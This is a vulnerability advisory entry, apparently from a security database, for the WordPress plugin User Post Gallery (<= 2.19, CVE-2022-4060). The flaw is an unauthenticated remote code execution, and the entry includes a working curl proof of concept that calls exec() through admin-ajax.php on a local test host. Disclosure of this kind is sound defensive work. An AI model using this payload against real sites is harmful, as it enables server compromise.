Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitCydaveWPEX-ID:8F982EBD-6FC5-452D-8280-42E027D01B1E
HistoryDec 23, 2022 - 12:00 a.m.

User Post Gallery <= 2.19 - Unauthenticated RCE

2022-12-2300:00:00
cydave
209
rce unauthenticated php exec

EPSS

0.385

Percentile

97.3%

JSON

The plugin does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it.

Invoke the following curl command to execute the "id" command via PHP's exec() function:

curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'

Related

cve 2
cvelist 1
prion 2
nvd 2
wpvulndb 1
nuclei 1
githubexploit 1
cve
cve
CVE-2022-4060
2023-01-16 16:15:11
CVE-2023-0039
2023-01-03 15:15:10
cvelist
cvelist
CVE-2022-4060 User Post Gallery <= 2.19 - Unauthenticated RCE
2023-01-16 15:38:05
prion
prion
Code injection
2023-01-16 16:15:00
Open redirect
2023-01-03 15:15:00
nvd
nvd
CVE-2022-4060
2023-01-16 16:15:11
CVE-2023-0039
2023-01-03 15:15:10
wpvulndb
wpvulndb
User Post Gallery <= 2.19 - Unauthenticated RCE
2022-12-23 00:00:00
nuclei
nuclei
WordPress User Post Gallery <=2.19 - Remote Code Execution
2023-03-05 13:42:10
githubexploit
githubexploit
Exploit for CVE-2022-4060
2023-09-15 21:38:47

EPSS

0.385

Percentile

97.3%

JSON
Related for WPEX-ID:8F982EBD-6FC5-452D-8280-42E027D01B1E
cve2cvelist1prion2nvd2wpvulndb1nuclei1githubexploit1